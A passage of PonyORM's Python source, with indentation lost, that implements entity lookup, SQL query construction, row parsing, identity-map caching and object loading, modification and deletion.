found_in_cache = True
tried_ids.add(id)
result.append(obj)
n -= 1
else: ids.append(id)
if len(ids) >= n: break
if len(result) >= limit: break
if not ids: continue
sql, adapter, attr_offsets = entity._construct_batchload_sql_(len(ids), from_seeds=False)
arguments = adapter([ (id,) for id in ids ])
cursor = database._exec_sql(sql, arguments)
objects = entity._fetch_objects(cursor, attr_offsets)
result.extend(objects)
tried_ids.update(ids)
if len(result) >= limit: break
if len(result) < limit: return entity.select().random(limit)
result = result[:limit]
if entity._subclasses_:
seeds = cache.seeds[entity._pk_attrs_]
if seeds:
for obj in result:
if obj in seeds: obj._load_()
if found_in_cache: shuffle(result)
return result
def _find_one_(entity, kwargs, for_update=False, nowait=False):
if entity._database_.schema is None:
throw(ERDiagramError, 'Mapping is not generated for entity %r' % entity.__name__)
avdict = {}
get_attr = entity._adict_.get
for name, val in iteritems(kwargs):
attr = get_attr(name)
if attr is None: throw(TypeError, 'Unknown attribute %r' % name)
avdict[attr] = attr.validate(val, None, entity, from_db=False)
if entity._pk_is_composite_:
pkval = tuple(imap(avdict.get, entity._pk_attrs_))
if None in pkval: pkval = None
else: pkval = avdict.get(entity._pk_attrs_[0])
for attr in avdict:
if attr.is_collection:
throw(TypeError, 'Collection attribute %s cannot be specified as search criteria' % attr)
obj, unique = entity._find_in_cache_(pkval, avdict, for_update)
if obj is None: obj = entity._find_in_db_(avdict, unique, for_update, nowait)
if obj is None: throw(ObjectNotFound, entity, pkval)
return obj
def _find_in_cache_(entity, pkval, avdict, for_update=False):
cache = entity._database_._get_cache()
cache_indexes = cache.indexes
obj = None
unique = False
if pkval is not None:
unique = True
obj = cache_indexes[entity._pk_attrs_].get(pkval)
if obj is None:
for attr in entity._simple_keys_:
val = avdict.get(attr)
if val is not None:
unique = True
obj = cache_indexes[attr].get(val)
if obj is not None: break
if obj is None:
for attrs in entity._composite_keys_:
get_val = avdict.get
vals = tuple(get_val(attr) for attr in attrs)
if None in vals: continue
unique = True
cache_index = cache_indexes.get(attrs)
if cache_index is None: continue
obj = cache_index.get(vals)
if obj is not None: break
if obj is None:
for attr, val in iteritems(avdict):
if val is None: continue
reverse = attr.reverse
if reverse and not reverse.is_collection:
obj = reverse.__get__(val)
break
if obj is not None:
if obj._discriminator_ is not None:
if obj._subclasses_:
cls = obj.__class__
if not issubclass(entity, cls) and not issubclass(cls, entity):
throw(ObjectNotFound, entity, pkval)
seeds = cache.seeds[entity._pk_attrs_]
if obj in seeds: obj._load_()
if not isinstance(obj, entity): throw(ObjectNotFound, entity, pkval)
if obj._status_ == 'marked_to_delete': throw(ObjectNotFound, entity, pkval)
for attr, val in iteritems(avdict):
if val != attr.__get__(obj): throw(ObjectNotFound, entity, pkval)
if for_update and obj not in cache.for_update:
return None, unique # object is found, but it is not locked
entity._set_rbits((obj,), avdict)
return obj, unique
return None, unique
def _find_in_db_(entity, avdict, unique=False, for_update=False, nowait=False):
database = entity._database_
query_attrs = {attr: value is None for attr, value in iteritems(avdict)}
limit = 2 if not unique else None
sql, adapter, attr_offsets = entity._construct_sql_(query_attrs, False, limit, for_update, nowait)
arguments = adapter(avdict)
if for_update: database._get_cache().immediate = True
cursor = database._exec_sql(sql, arguments)
objects = entity._fetch_objects(cursor, attr_offsets, 1, for_update, avdict)
return objects[0] if objects else None
def _find_by_sql_(entity, max_fetch_count, sql, globals, locals, frame_depth):
if not isinstance(sql, basestring): throw(TypeError)
database = entity._database_
cursor = database._exec_raw_sql(sql, globals, locals, frame_depth+1)
col_names = [ column_info[0].upper() for column_info in cursor.description ]
attr_offsets = {}
used_columns = set()
for attr in chain(entity._attrs_with_columns_, entity._subclass_attrs_):
offsets = []
for column in attr.columns:
try: offset = col_names.index(column.upper())
except ValueError: break
offsets.append(offset)
used_columns.add(offset)
else: attr_offsets[attr] = offsets
if len(used_columns) < len(col_names):
for i in xrange(len(col_names)):
if i not in used_columns: throw(NameError,
'Column %s does not belong to entity %s' % (cursor.description[i][0], entity.__name__))
for attr in entity._pk_attrs_:
if attr not in attr_offsets: throw(ValueError,
'Primary key attribue %s was not found in query result set' % attr)
objects = entity._fetch_objects(cursor, attr_offsets, max_fetch_count)
return objects
def _construct_select_clause_(entity, alias=None, distinct=False,
query_attrs=(), attrs_to_prefetch=(), all_attributes=False):
attr_offsets = {}
select_list = [ 'DISTINCT' ] if distinct else [ 'ALL' ]
root = entity._root_
for attr in chain(root._attrs_, root._subclass_attrs_):
if not all_attributes and not issubclass(attr.entity, entity) \
and not issubclass(entity, attr.entity): continue
if attr.is_collection: continue
if not attr.columns: continue
if not attr.lazy or attr in query_attrs or attr in attrs_to_prefetch:
attr_offsets[attr] = offsets = []
for column in attr.columns:
offsets.append(len(select_list) - 1)
select_list.append([ 'COLUMN', alias, column ])
return select_list, attr_offsets
def _construct_discriminator_criteria_(entity, alias=None):
discr_attr = entity._discriminator_attr_
if discr_attr is None: return None
code2cls = discr_attr.code2cls
discr_values = [ [ 'VALUE', cls._discriminator_ ] for cls in entity._subclasses_ ]
discr_values.append([ 'VALUE', entity._discriminator_])
return [ 'IN', [ 'COLUMN', alias, discr_attr.column ], discr_values ]
def _construct_batchload_sql_(entity, batch_size, attr=None, from_seeds=True):
query_key = batch_size, attr, from_seeds
cached_sql = entity._batchload_sql_cache_.get(query_key)
if cached_sql is not None: return cached_sql
select_list, attr_offsets = entity._construct_select_clause_(all_attributes=True)
from_list = [ 'FROM', [ None, 'TABLE', entity._table_ ]]
if attr is None:
columns = entity._pk_columns_
converters = entity._pk_converters_
else:
columns = attr.columns
converters = attr.converters
row_value_syntax = entity._database_.provider.translator_cls.row_value_syntax
criteria_list = construct_batchload_criteria_list(
None, columns, converters, batch_size, row_value_syntax, from_seeds=from_seeds)
sql_ast = [ 'SELECT', select_list, from_list, [ 'WHERE' ] + criteria_list ]
database = entity._database_
sql, adapter = database._ast2sql(sql_ast)
cached_sql = sql, adapter, attr_offsets
entity._batchload_sql_cache_[query_key] = cached_sql
return cached_sql
def _construct_sql_(entity, query_attrs, order_by_pk=False, limit=None, for_update=False, nowait=False):
if nowait: assert for_update
sorted_query_attrs = tuple(sorted(query_attrs.items()))
query_key = sorted_query_attrs, order_by_pk, limit, for_update, nowait
cached_sql = entity._find_sql_cache_.get(query_key)
if cached_sql is not None: return cached_sql
select_list, attr_offsets = entity._construct_select_clause_(query_attrs=query_attrs)
from_list = [ 'FROM', [ None, 'TABLE', entity._table_ ]]
where_list = [ 'WHERE' ]
discr_attr = entity._discriminator_attr_
if discr_attr and query_attrs.get(discr_attr) != False:
discr_criteria = entity._construct_discriminator_criteria_()
if discr_criteria: where_list.append(discr_criteria)
for attr, attr_is_none in sorted_query_attrs:
if not attr.reverse:
if attr_is_none: where_list.append([ 'IS_NULL', [ 'COLUMN', None, attr.column ] ])
else:
if len(attr.converters) > 1: throw(NotImplementedError)
converter = attr.converters[0]
where_list.append([ converter.EQ, [ 'COLUMN', None, attr.column ], [ 'PARAM', (attr, None, None), converter ] ])
elif not attr.columns: throw(NotImplementedError)
else:
attr_entity = attr.py_type; assert attr_entity == attr.reverse.entity
if attr_is_none:
for column in attr.columns:
where_list.append([ 'IS_NULL', [ 'COLUMN', None, column ] ])
else:
for j, (column, converter) in enumerate(izip(attr.columns, attr_entity._pk_converters_)):
where_list.append([ converter.EQ, [ 'COLUMN', None, column ], [ 'PARAM', (attr, None, j), converter ] ])
if not for_update: sql_ast = [ 'SELECT', select_list, from_list, where_list ]
else: sql_ast = [ 'SELECT_FOR_UPDATE', bool(nowait), select_list, from_list, where_list ]
if order_by_pk: sql_ast.append([ 'ORDER_BY' ] + [ [ 'COLUMN', None, column ] for column in entity._pk_columns_ ])
if limit is not None: sql_ast.append([ 'LIMIT', limit ])
database = entity._database_
sql, adapter = database._ast2sql(sql_ast)
cached_sql = sql, adapter, attr_offsets
entity._find_sql_cache_[query_key] = cached_sql
return cached_sql
def _fetch_objects(entity, cursor, attr_offsets, max_fetch_count=None, for_update=False, used_attrs=()):
if max_fetch_count is None: max_fetch_count = options.MAX_FETCH_COUNT
if max_fetch_count is not None:
rows = cursor.fetchmany(max_fetch_count + 1)
if len(rows) == max_fetch_count + 1:
if max_fetch_count == 1: throw(MultipleObjectsFoundError,
'Multiple objects were found. Use %s.select(...) to retrieve them' % entity.__name__)
throw(TooManyObjectsFoundError,
'Found more then pony.options.MAX_FETCH_COUNT=%d objects' % options.MAX_FETCH_COUNT)
else: rows = cursor.fetchall()
objects = []
if attr_offsets is None:
objects = [ entity._get_by_raw_pkval_(row, for_update) for row in rows ]
entity._load_many_(objects)
else:
for row in rows:
real_entity_subclass, pkval, avdict = entity._parse_row_(row, attr_offsets)
obj = real_entity_subclass._get_from_identity_map_(pkval, 'loaded', for_update)
if obj._status_ in del_statuses: continue
obj._db_set_(avdict)
objects.append(obj)
if used_attrs: entity._set_rbits(objects, used_attrs)
return objects
def _set_rbits(entity, objects, attrs):
rbits_dict = {}
get_rbits = rbits_dict.get
for obj in objects:
wbits = obj._wbits_
if wbits is None: continue
rbits = get_rbits(obj.__class__)
if rbits is None:
rbits = sum(obj._bits_except_volatile_.get(attr, 0) for attr in attrs)
rbits_dict[obj.__class__] = rbits
obj._rbits_ |= rbits & ~wbits
def _parse_row_(entity, row, attr_offsets):
discr_attr = entity._discriminator_attr_
if not discr_attr:
discr_value = None
real_entity_subclass = entity
else:
discr_offset = attr_offsets[discr_attr][0]
discr_value = discr_attr.validate(row[discr_offset], None, entity, from_db=True)
real_entity_subclass = discr_attr.code2cls[discr_value]
discr_value = real_entity_subclass._discriminator_ # To convert unicode to str in Python 2.x
avdict = {}
for attr in real_entity_subclass._attrs_:
offsets = attr_offsets.get(attr)
if offsets is None or attr.is_discriminator: continue
avdict[attr] = attr.parse_value(row, offsets)
pkval = tuple(avdict.pop(attr, discr_value) for attr in entity._pk_attrs_)
assert None not in pkval
if not entity._pk_is_composite_: pkval = pkval[0]
return real_entity_subclass, pkval, avdict
def _load_many_(entity, objects):
database = entity._database_
cache = database._get_cache()
seeds = cache.seeds[entity._pk_attrs_]
if not seeds: return
objects = {obj for obj in objects if obj in seeds}
objects = sorted(objects, key=attrgetter('_pkval_'))
max_batch_size = database.provider.max_params_count // len(entity._pk_columns_)
while objects:
batch = objects[:max_batch_size]
objects = objects[max_batch_size:]
sql, adapter, attr_offsets = entity._construct_batchload_sql_(len(batch))
arguments = adapter(batch)
cursor = database._exec_sql(sql, arguments)
result = entity._fetch_objects(cursor, attr_offsets)
if len(result) < len(batch):
for obj in result:
if obj not in batch: throw(UnrepeatableReadError,
'Phantom object %s disappeared' % safe_repr(obj))
def _select_all(entity):
return Query(entity._default_iter_name_, entity._default_genexpr_, {}, { '.0' : entity })
def _query_from_args_(entity, args, kwargs, frame_depth):
if not args and not kwargs: return entity._select_all()
func, globals, locals = get_globals_and_locals(args, kwargs, frame_depth+1)
if type(func) is types.FunctionType:
names = get_lambda_args(func)
code_key = id(func.func_code if PY2 else func.__code__)
cond_expr, external_names, cells = decompile(func)
elif isinstance(func, basestring):
code_key = func
lambda_ast = string2ast(func)
if not isinstance(lambda_ast, ast.Lambda):
throw(TypeError, 'Lambda function is expected. Got: %s' % func)
names = get_lambda_args(lambda_ast)
cond_expr = lambda_ast.code
cells = None
else: assert False # pragma: no cover
if len(names) != 1: throw(TypeError,
'Lambda query requires exactly one parameter name, like %s.select(lambda %s: ...). '
'Got: %d parameters' % (entity.__name__, entity.__name__[0].lower(), len(names)))
name = names[0]
if_expr = ast.GenExprIf(cond_expr)
for_expr = ast.GenExprFor(ast.AssName(name, 'OP_ASSIGN'), ast.Name('.0'), [ if_expr ])
inner_expr = ast.GenExprInner(ast.Name(name), [ for_expr ])
locals = locals.copy() if locals is not None else {}
assert '.0' not in locals
locals['.0'] = entity
return Query(code_key, inner_expr, globals, locals, cells)
def _get_from_identity_map_(entity, pkval, status, for_update=False, undo_funcs=None, obj_to_init=None):
cache = entity._database_._get_cache()
pk_attrs = entity._pk_attrs_
cache_index = cache.indexes[pk_attrs]
if pkval is None: obj = None
else: obj = cache_index.get(pkval)
if obj is None: pass
elif status == 'created':
if entity._pk_is_composite_: pkval = ', '.join(str(item) for item in pkval)
throw(CacheIndexError, 'Cannot create %s: instance with primary key %s already exists'
% (obj.__class__.__name__, pkval))
elif obj.__class__ is entity: pass
elif issubclass(obj.__class__, entity): pass
elif not issubclass(entity, obj.__class__): throw(TransactionError,
'Unexpected class change from %s to %s for object with primary key %r' %
(obj.__class__, entity, obj._pkval_))
elif obj._rbits_ or obj._wbits_: throw(NotImplementedError)
else: obj.__class__ = entity
if obj is None:
with cache.flush_disabled():
obj = obj_to_init
if obj_to_init is None:
obj = object.__new__(entity)
cache.objects.add(obj)
obj._pkval_ = pkval
obj._status_ = status
obj._vals_ = {}
obj._dbvals_ = {}
obj._save_pos_ = None
obj._session_cache_ = cache
if pkval is not None:
cache_index[pkval] = obj
obj._newid_ = None
else: obj._newid_ = next(new_instance_id_counter)
if obj._pk_is_composite_: pairs = izip(pk_attrs, pkval)
else: pairs = ((pk_attrs[0], pkval),)
if status == 'loaded':
assert undo_funcs is None
obj._rbits_ = obj._wbits_ = 0
for attr, val in pairs:
obj._vals_[attr] = val
if attr.reverse: attr.db_update_reverse(obj, NOT_LOADED, val)
cache.seeds[pk_attrs].add(obj)
elif status == 'created':
assert undo_funcs is not None
obj._rbits_ = obj._wbits_ = None
for attr, val in pairs:
obj._vals_[attr] = val
if attr.reverse: attr.update_reverse(obj, NOT_LOADED, val, undo_funcs)
cache.for_update.add(obj)
else: assert False # pragma: no cover
if for_update:
assert cache.in_transaction
cache.for_update.add(obj)
return obj
def _get_by_raw_pkval_(entity, raw_pkval, for_update=False, from_db=True):
i = 0
pkval = []
for attr in entity._pk_attrs_:
if attr.column is not None:
val = raw_pkval[i]
i += 1
if not attr.reverse: val = attr.validate(val, None, entity, from_db=from_db)
else: val = attr.py_type._get_by_raw_pkval_((val,), from_db=from_db)
else:
if not attr.reverse: throw(NotImplementedError)
vals = raw_pkval[i:i+len(attr.columns)]
val = attr.py_type._get_by_raw_pkval_(vals, from_db=from_db)
i += len(attr.columns)
pkval.append(val)
if not entity._pk_is_composite_: pkval = pkval[0]
else: pkval = tuple(pkval)
obj = entity._get_from_identity_map_(pkval, 'loaded', for_update)
assert obj._status_ != 'cancelled'
return obj
def _get_propagation_mixin_(entity):
mixin = entity._propagation_mixin_
if mixin is not None: return mixin
cls_dict = { '_entity_' : entity }
for attr in entity._attrs_:
if not attr.reverse:
def fget(wrapper, attr=attr):
attrnames = wrapper._attrnames_ + (attr.name,)
items = [ x for x in (attr.__get__(item) for item in wrapper) if x is not None ]
if attr.py_type is Json:
return [ item.get_untracked() if isinstance(item, TrackedValue) else item for item in items ]
return Multiset(wrapper._obj_, attrnames, items)
elif not attr.is_collection:
def fget(wrapper, attr=attr):
attrnames = wrapper._attrnames_ + (attr.name,)
items = [ x for x in (attr.__get__(item) for item in wrapper) if x is not None ]
rentity = attr.py_type
cls = rentity._get_multiset_subclass_()
return cls(wrapper._obj_, attrnames, items)
else:
def fget(wrapper, attr=attr):
cache = attr.entity._database_._get_cache()
cache.collection_statistics.setdefault(attr, attr.nplus1_threshold)
attrnames = wrapper._attrnames_ + (attr.name,)
items = [ subitem for item in wrapper
for subitem in attr.__get__(item) ]
rentity = attr.py_type
cls = rentity._get_multiset_subclass_()
return cls(wrapper._obj_, attrnames, items)
cls_dict[attr.name] = property(fget)
result_cls_name = entity.__name__ + 'SetMixin'
result_cls = type(result_cls_name, (object,), cls_dict)
entity._propagation_mixin_ = result_cls
return result_cls
def _get_multiset_subclass_(entity):
result_cls = entity._multiset_subclass_
if result_cls is None:
mixin = entity._get_propagation_mixin_()
cls_name = entity.__name__ + 'Multiset'
result_cls = type(cls_name, (Multiset, mixin), {})
entity._multiset_subclass_ = result_cls
return result_cls
def _get_set_wrapper_subclass_(entity):
result_cls = entity._set_wrapper_subclass_
if result_cls is None:
mixin = entity._get_propagation_mixin_()
cls_name = entity.__name__ + 'Set'
result_cls = type(cls_name, (SetInstance, mixin), {})
entity._set_wrapper_subclass_ = result_cls
return result_cls
@cut_traceback
def describe(entity):
result = []
parents = ','.join(cls.__name__ for cls in entity.__bases__)
result.append('class %s(%s):' % (entity.__name__, parents))
if entity._base_attrs_:
result.append('# inherited attrs')
result.extend(attr.describe() for attr in entity._base_attrs_)
result.append('# attrs introduced in %s' % entity.__name__)
result.extend(attr.describe() for attr in entity._new_attrs_)
if entity._pk_is_composite_:
result.append('PrimaryKey(%s)' % ', '.join(attr.name for attr in entity._pk_attrs_))
return '\n '.join(result)
@cut_traceback
@db_session(ddl=True)
def drop_table(entity, with_all_data=False):
entity._database_._drop_tables([ entity._table_ ], True, with_all_data)
def _get_attrs_(entity, only=None, exclude=None, with_collections=False, with_lazy=False):
if only and not isinstance(only, basestring): only = tuple(only)
if exclude and not isinstance(exclude, basestring): exclude = tuple(exclude)
key = (only, exclude, with_collections, with_lazy)
attrs = entity._attrnames_cache_.get(key)
if not attrs:
attrs = []
append = attrs.append
if only:
if isinstance(only, basestring): only = only.replace(',', ' ').split()
get_attr = entity._adict_.get
for attrname in only:
attr = get_attr(attrname)
if attr is None: throw(AttributeError,
'Entity %s does not have attriute %s' % (entity.__name__, attrname))
else: append(attr)
else:
for attr in entity._attrs_:
if attr.is_collection:
if with_collections: append(attr)
elif attr.lazy:
if with_lazy: append(attr)
else: append(attr)
if exclude:
if isinstance(exclude, basestring): exclude = exclude.replace(',', ' ').split()
for attrname in exclude:
if attrname not in entity._adict_: throw(AttributeError,
'Entity %s does not have attriute %s' % (entity.__name__, attrname))
attrs = (attr for attr in attrs if attr.name not in exclude)
attrs = tuple(attrs)
entity._attrnames_cache_[key] = attrs
return attrs
def populate_criteria_list(criteria_list, columns, converters, operations,
params_count=0, table_alias=None, optimistic=False):
for column, op, converter in izip(columns, operations, converters):
if op == 'IS_NULL':
criteria_list.append([ op, [ 'COLUMN', None, column ] ])
else:
criteria_list.append([ op, [ 'COLUMN', table_alias, column ],
[ 'PARAM', (params_count, None, None), converter, optimistic ] ])
params_count += 1
return params_count
statuses = {'created', 'cancelled', 'loaded', 'modified', 'inserted', 'updated', 'marked_to_delete', 'deleted'}
del_statuses = {'marked_to_delete', 'deleted', 'cancelled'}
created_or_deleted_statuses = {'created'} | del_statuses
saved_statuses = {'inserted', 'updated', 'deleted'}
def throw_object_was_deleted(obj):
assert obj._status_ in del_statuses
throw(OperationWithDeletedObjectError, '%s was %s'
% (safe_repr(obj), obj._status_.replace('_', ' ')))
def unpickle_entity(d):
entity = d.pop('__class__')
cache = entity._database_._get_cache()
if not entity._pk_is_composite_: pkval = d.get(entity._pk_attrs_[0].name)
else: pkval = tuple(d[attr.name] for attr in entity._pk_attrs_)
assert pkval is not None
obj = entity._get_from_identity_map_(pkval, 'loaded')
if obj._status_ in del_statuses: return obj
avdict = {}
for attrname, val in iteritems(d):
attr = entity._adict_[attrname]
if attr.pk_offset is not None: continue
avdict[attr] = val
obj._db_set_(avdict, unpickling=True)
return obj
def safe_repr(obj):
return Entity.__repr__(obj)
class Entity(with_metaclass(EntityMeta)):
__slots__ = '_session_cache_', '_status_', '_pkval_', '_newid_', '_dbvals_', '_vals_', '_rbits_', '_wbits_', '_save_pos_', '__weakref__'
def __reduce__(obj):
if obj._status_ in del_statuses: throw(
OperationWithDeletedObjectError, 'Deleted object %s cannot be pickled' % safe_repr(obj))
if obj._status_ in ('created', 'modified'): throw(
OrmError, '%s object %s has to be stored in DB before it can be pickled'
% (obj._status_.capitalize(), safe_repr(obj)))
d = {'__class__' : obj.__class__}
adict = obj._adict_
for attr, val in iteritems(obj._vals_):
if not attr.is_collection: d[attr.name] = val
return unpickle_entity, (d,)
@cut_traceback
def __init__(obj, *args, **kwargs):
obj._status_ = None
entity = obj.__class__
if args: raise TypeError('%s constructor accept only keyword arguments. Got: %d positional argument%s'
% (entity.__name__, len(args), len(args) > 1 and 's' or ''))
if entity._database_.schema is None:
throw(ERDiagramError, 'Mapping is not generated for entity %r' % entity.__name__)
avdict = {}
for name in kwargs:
if name not in entity._adict_: throw(TypeError, 'Unknown attribute %r' % name)
for attr in entity._attrs_:
val = kwargs.get(attr.name, DEFAULT)
avdict[attr] = attr.validate(val, obj, entity, from_db=False)
if entity._pk_is_composite_:
pkval = tuple(imap(avdict.get, entity._pk_attrs_))
if None in pkval: pkval = None
else: pkval = avdict.get(entity._pk_attrs_[0])
undo_funcs = []
cache = entity._database_._get_cache()
cache_indexes = cache.indexes
indexes_update = {}
with cache.flush_disabled():
for attr in entity._simple_keys_:
val = avdict[attr]
if val is None: continue
if val in cache_indexes[attr]: throw(CacheIndexError,
'Cannot create %s: value %r for key %s already exists' % (entity.__name__, val, attr.name))
indexes_update[attr] = val
for attrs in entity._composite_keys_:
vals = tuple(avdict[attr] for attr in attrs)
if None in vals: continue
if vals in cache_indexes[attrs]:
attr_names = ', '.join(attr.name for attr in attrs)
throw(CacheIndexError, 'Cannot create %s: value %s for composite key (%s) already exists'
% (entity.__name__, vals, attr_names))
indexes_update[attrs] = vals
try:
entity._get_from_identity_map_(pkval, 'created', undo_funcs=undo_funcs, obj_to_init=obj)
for attr, val in iteritems(avdict):
if attr.pk_offset is not None: continue
elif not attr.is_collection:
obj._vals_[attr] = val
if attr.reverse: attr.update_reverse(obj, None, val, undo_funcs)
else: attr.__set__(obj, val, undo_funcs)
except:
for undo_func in reversed(undo_funcs): undo_func()
raise
if pkval is not None: cache_indexes[entity._pk_attrs_][pkval] = obj
for key, vals in iteritems(indexes_update): cache_indexes[key][vals] = obj
objects_to_save = cache.objects_to_save
obj._save_pos_ = len(objects_to_save)
objects_to_save.append(obj)
cache.modified = True
def get_pk(obj):
pkval = obj._get_raw_pkval_()
if len(pkval) == 1: return pkval[0]
return pkval
def _get_raw_pkval_(obj):
pkval = obj._pkval_
if not obj._pk_is_composite_:
if not obj._pk_attrs_[0].reverse: return (pkval,)
else: return pkval._get_raw_pkval_()
raw_pkval = []
append, extend = raw_pkval.append, raw_pkval.extend
for attr, val in izip(obj._pk_attrs_, pkval):
if not attr.reverse: append(val)
else: extend(val._get_raw_pkval_())
return tuple(raw_pkval)
@cut_traceback
def __lt__(entity, other):
return entity._cmp_(other) < 0
@cut_traceback
def __le__(entity, other):
return entity._cmp_(other) <= 0
@cut_traceback
def __gt__(entity, other):
return entity._cmp_(other) > 0
@cut_traceback
def __ge__(entity, other):
return entity._cmp_(other) >= 0
def _cmp_(entity, other):
if entity is other: return 0
if isinstance(other, Entity):
pkval = entity._pkval_
other_pkval = other._pkval_
if pkval is not None:
if other_pkval is None: return -1
result = cmp(pkval, other_pkval)
else:
if other_pkval is not None: return 1
result = cmp(entity._newid_, other._newid_)
if result: return result
return cmp(id(entity), id(other))
@cut_traceback
def __repr__(obj):
pkval = obj._pkval_
if pkval is None: return '%s[new:%d]' % (obj.__class__.__name__, obj._newid_)
if obj._pk_is_composite_: pkval = ','.join(imap(repr, pkval))
else: pkval = repr(pkval)
return '%s[%s]' % (obj.__class__.__name__, pkval)
def _load_(obj):
cache = obj._session_cache_
if cache is None or not cache.is_alive: throw_db_session_is_over('load object', obj)
entity = obj.__class__
database = entity._database_
if cache is not database._get_cache():
throw(TransactionError, "Object %s doesn't belong to current transaction" % safe_repr(obj))
seeds = cache.seeds[entity._pk_attrs_]
max_batch_size = database.provider.max_params_count // len(entity._pk_columns_)
objects = [ obj ]
if options.PREFETCHING:
for seed in seeds:
if len(objects) >= max_batch_size: break
if seed is not obj: objects.append(seed)
sql, adapter, attr_offsets = entity._construct_batchload_sql_(len(objects))
arguments = adapter(objects)
cursor = database._exec_sql(sql, arguments)
objects = entity._fetch_objects(cursor, attr_offsets)
if obj not in objects: throw(UnrepeatableReadError,
'Phantom object %s disappeared' % safe_repr(obj))
@cut_traceback
def load(obj, *attrs):
cache = obj._session_cache_
if cache is None or not cache.is_alive: throw_db_session_is_over('load object', obj)
entity = obj.__class__
database = entity._database_
if cache is not database._get_cache():
throw(TransactionError, "Object %s doesn't belong to current transaction" % safe_repr(obj))
if obj._status_ in created_or_deleted_statuses: return
if not attrs:
attrs = tuple(attr for attr, bit in iteritems(entity._bits_)
if bit and attr not in obj._vals_)
else:
args = attrs
attrs = set()
for arg in args:
if isinstance(arg, basestring):
attr = entity._adict_.get(arg)
if attr is None:
if not is_ident(arg): throw(ValueError, 'Invalid attribute name: %r' % arg)
throw(AttributeError, 'Object %s does not have attribute %r' % (obj, arg))
elif isinstance(arg, Attribute):
attr = arg
if not isinstance(obj, attr.entity): throw(AttributeError,
'Attribute %s does not belong to object %s' % (attr, obj))
else: throw(TypeError, 'Invalid argument type: %r' % arg)
if attr.is_collection: throw(NotImplementedError,
'The load() method does not support collection attributes yet. Got: %s' % attr.name)
if entity._bits_[attr] and attr not in obj._vals_: attrs.add(attr)
attrs = tuple(sorted(attrs, key=attrgetter('id')))
sql_cache = entity._root_._load_sql_cache_
cached_sql = sql_cache.get(attrs)
if cached_sql is None:
if entity._discriminator_attr_ is not None:
attrs = (entity._discriminator_attr_,) + attrs
attrs = entity._pk_attrs_ + attrs
attr_offsets = {}
select_list = [ 'ALL' ]
for attr in attrs:
attr_offsets[attr] = offsets = []
for column in attr.columns:
offsets.append(len(select_list) - 1)
select_list.append([ 'COLUMN', None, column ])
from_list = [ 'FROM', [ None, 'TABLE', entity._table_ ]]
criteria_list = [ [ converter.EQ, [ 'COLUMN', None, column ], [ 'PARAM', (i, None, None), converter ] ]
for i, (column, converter) in enumerate(izip(obj._pk_columns_, obj._pk_converters_)) ]
where_list = [ 'WHERE' ] + criteria_list
sql_ast = [ 'SELECT', select_list, from_list, where_list ]
sql, adapter = database._ast2sql(sql_ast)
cached_sql = sql, adapter, attr_offsets
sql_cache[attrs] = cached_sql
else: sql, adapter, attr_offsets = cached_sql
arguments = adapter(obj._get_raw_pkval_())
cursor = database._exec_sql(sql, arguments)
objects = entity._fetch_objects(cursor, attr_offsets)
if obj not in objects: throw(UnrepeatableReadError,
'Phantom object %s disappeared' % safe_repr(obj))
def _attr_changed_(obj, attr):
cache = obj._session_cache_
if cache is None or not cache.is_alive: throw_db_session_is_over('assign new value to', obj, attr)
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
status = obj._status_
wbits = obj._wbits_
bit = obj._bits_[attr]
objects_to_save = cache.objects_to_save
if wbits is not None and bit:
obj._wbits_ |= bit
if status != 'modified':
assert status in ('loaded', 'inserted', 'updated')
assert obj._save_pos_ is None
obj._status_ = 'modified'
obj._save_pos_ = len(objects_to_save)
objects_to_save.append(obj)
cache.modified = True
def _db_set_(obj, avdict, unpickling=False):
assert obj._status_ not in created_or_deleted_statuses
cache = obj._session_cache_
assert cache is not None and cache.is_alive
cache.seeds[obj._pk_attrs_].discard(obj)
if not avdict: return
get_val = obj._vals_.get
get_dbval = obj._dbvals_.get
rbits = obj._rbits_
wbits = obj._wbits_
for attr, new_dbval in items_list(avdict):
assert attr.pk_offset is None
assert new_dbval is not NOT_LOADED
old_dbval = get_dbval(attr, NOT_LOADED)
if old_dbval is not NOT_LOADED:
if unpickling or old_dbval == new_dbval or (
not attr.reverse and attr.converters[0].dbvals_equal(old_dbval, new_dbval)):
del avdict[attr]
continue
bit = obj._bits_except_volatile_[attr]
if rbits & bit:
errormsg = 'Please contact PonyORM developers so they can ' \
'reproduce your error and fix a bug: support@ponyorm.com'
assert old_dbval is not NOT_LOADED, errormsg
throw(UnrepeatableReadError,
'Value of %s.%s for %s was updated outside of current transaction (was: %r, now: %r)'
% (obj.__class__.__name__, attr.name, obj, old_dbval, new_dbval))
if attr.reverse: attr.db_update_reverse(obj, old_dbval, new_dbval)
obj._dbvals_[attr] = new_dbval
if wbits & bit: del avdict[attr]
if attr.is_unique:
old_val = get_val(attr)
if old_val != new_dbval:
cache.db_update_simple_index(obj, attr, old_val, new_dbval)
for attrs in obj._composite_keys_:
if any(attr in avdict for attr in attrs):
vals = [ get_val(a) for a in attrs ] # In Python 2 var name leaks into the function scope!
prev_vals = tuple(vals)
for i, attr in enumerate(attrs):
if attr in avdict: vals[i] = avdict[attr]
new_vals = tuple(vals)
cache.db_update_composite_index(obj, attrs, prev_vals, new_vals)
for attr, new_val in iteritems(avdict):
if not attr.reverse:
assert len(attr.converters) == 1, attr
converter = attr.converters[0]
new_val = converter.dbval2val(new_val, obj)
obj._vals_[attr] = new_val
def _delete_(obj, undo_funcs=None):
status = obj._status_
if status in del_statuses: return
is_recursive_call = undo_funcs is not None
if not is_recursive_call: undo_funcs = []
cache = obj._session_cache_
assert cache is not None and cache.is_alive
with cache.flush_disabled():
get_val = obj._vals_.get
undo_list = []
objects_to_save = cache.objects_to_save
save_pos = obj._save_pos_
def undo_func():
if obj._status_ == 'marked_to_delete':
assert objects_to_save
obj2 = objects_to_save.pop()
assert obj2 is obj
if save_pos is not None:
assert objects_to_save[save_pos] is None
objects_to_save[save_pos] = obj
obj._save_pos_ = save_pos
obj._status_ = status
for cache_index, old_key in undo_list: cache_index[old_key] = obj
undo_funcs.append(undo_func)
try:
for attr in obj._attrs_:
if not attr.is_collection: continue
if isinstance(attr, Set):
set_wrapper = attr.__get__(obj)
if not set_wrapper.__nonzero__(): pass
elif attr.cascade_delete:
for robj in set_wrapper: robj._delete_(undo_funcs)
elif not attr.reverse.is_required: attr.__set__(obj, (), undo_funcs)
else: throw(ConstraintError, "Cannot delete object %s, because it has non-empty set of %s, "
"and 'cascade_delete' option of %s is not set"
% (obj, attr.name, attr))
else: throw(NotImplementedError)
for attr in obj._attrs_:
if not attr.is_collection:
reverse = attr.reverse
if not reverse: continue
if not reverse.is_collection:
val = get_val(attr) if attr in obj._vals_ else attr.load(obj)
